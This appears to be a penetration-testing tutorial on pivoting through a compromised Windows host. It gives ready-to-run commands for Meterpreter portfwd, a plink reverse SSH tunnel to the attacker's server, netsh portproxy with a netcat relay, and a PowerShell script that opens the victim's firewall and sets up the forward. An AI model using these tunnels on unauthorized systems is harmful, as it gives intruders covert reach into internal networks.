Windows

Metasploit

From an existing meterpreter session, portfwd opens a listener on our machine (-l) and relays whatever reaches it through the session to the host (-r) and port (-p) as the victim sees them. Here, connections to 127.0.0.1:8080 on our machine end up at the web server on 172.16.185.132:80, a host that is only reachable from the victim:

meterpreter> portfwd add -l 8080 -p 80 -r 172.16.185.132

portfwd list shows the active forwards and portfwd delete removes one with the same -l/-p/-r arguments.

Plink.exe

Plink is the command-line connection tool that ships with PuTTY (it is not a Microsoft tool); on Windows it fills the role the ssh client plays on a UNIX system. It is old, but it is a single standalone executable, so we can copy it from our attacking machine and run it on the victim without installing anything.

We first need an SSH server running on our own machine; in this case I create a dedicated low-privilege user for it so that our own credentials are never typed on the victim.

On the victim we then run plink in remote port forwarding mode; the syntax mirrors that of ssh:

plink.exe -ssh test@172.16.75.1 -R 8080:localhost:80

This opens port 8080 on our SSH server (172.16.75.1) and relays it, back through the tunnel, to port 80 on the victim itself, so browsing http://127.0.0.1:8080 on our machine reaches the victim's web service. Two caveats: the first connection asks to accept our host key (pipe echo y into plink, or pass -batch once the key is cached, and add -N so no shell is opened), and sshd binds remote forwards to 127.0.0.1 unless GatewayPorts is enabled, which is normally what we want.

NETSH

Here we use a Microsoft tool that is present by default, so it is a good option when we cannot upload files to the victim. The drawback is that it requires administrator privileges (the portproxy helper also depends on the IP Helper service, iphlpsvc, which is normally running).

On the victim we add a portproxy entry: Windows listens on the listenaddress and listenport we give it and relays every connection to the connectaddress and connectport. The command below exposes the victim's local web server (127.0.0.1:80) on port 8080 of every interface:

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=127.0.0.1

If the Windows Firewall is active, inbound connections to 8080 still need an allow rule. The show all form of the same netsh command lists the entries, and the delete v4tov4 form removes one when we are done.

On our machine we connect as in the previous examples. The netcat relay below listens on our local port 8080 and pipes it to port 8080 on the victim (192.168.1.38 in this example), so http://127.0.0.1:8080 on our side ends up at the victim's 127.0.0.1:80:

rm -f fifo;mkfifo fifo;nc -v -lk -p 8080 <fifo | nc 192.168.1.38 8080 >fifo
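The victim-side half of the netsh procedure above, as an added PowerShell example that is not code from the original page: it checks for an elevated shell and the IP Helper service, adds the portproxy entry together with the firewall rule it needs, verifies that a socket is really listening, and can tear everything down again. The script name Set-PortProxy.ps1 and the firewall rule name are assumptions.

```powershell
# Set-PortProxy.ps1 (hypothetical name) - added example, not code from the original page.
# Victim-side half of the netsh procedure: expose ConnectAddress:ConnectPort on 0.0.0.0:ListenPort.
param(
    [int]$ListenPort = 8080,          # port opened on every interface of the victim
    [string]$ConnectAddress = '127.0.0.1',
    [int]$ConnectPort = 80,           # service that is only reachable from the victim
    [switch]$Remove                   # tear the forward and the firewall rule down again
)

$ruleName = "portproxy-$ListenPort"   # assumed firewall rule name

# portproxy needs an elevated shell, so check up front instead of failing halfway through
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdmin  = ([Security.Principal.WindowsPrincipal]$identity).IsInRole(
    [Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) { throw 'netsh portproxy requires an administrator shell.' }

if ($Remove) {
    netsh interface portproxy delete v4tov4 "listenport=$ListenPort" listenaddress=0.0.0.0 | Out-Null
    netsh advfirewall firewall delete rule "name=$ruleName" | Out-Null
    Write-Host "Removed forward on port $ListenPort"
    return
}

# the portproxy helper is implemented by the IP Helper service (iphlpsvc); start it if needed
$svc = Get-Service -Name iphlpsvc -ErrorAction Stop
if ($svc.Status -ne 'Running') { Start-Service -Name iphlpsvc }

# the forward itself: connections to 0.0.0.0:ListenPort are relayed to ConnectAddress:ConnectPort
netsh interface portproxy add v4tov4 "listenport=$ListenPort" listenaddress=0.0.0.0 `
    "connectport=$ConnectPort" "connectaddress=$ConnectAddress" | Out-Null

# without this rule the Windows Firewall drops inbound connections to the new listener
netsh advfirewall firewall add rule "name=$ruleName" dir=in action=allow protocol=TCP "localport=$ListenPort" | Out-Null

# verify: the entry is registered and a socket (owned by svchost/iphlpsvc) is really listening
netsh interface portproxy show v4tov4
$listener = Get-NetTCPConnection -LocalPort $ListenPort -State Listen -ErrorAction SilentlyContinue
if ($listener) {
    Write-Host "Listening on 0.0.0.0:$ListenPort -> ${ConnectAddress}:$ConnectPort"
} else {
    Write-Warning "No listener on port $ListenPort; check 'netsh interface portproxy show all'"
}
```

Run it in an elevated PowerShell on the victim as .\Set-PortProxy.ps1 -ListenPort 8080 -ConnectPort 80, then connect from our machine exactly as above; .\Set-PortProxy.ps1 -ListenPort 8080 -Remove deletes both the forward and the firewall rule so nothing is left behind after the engagement.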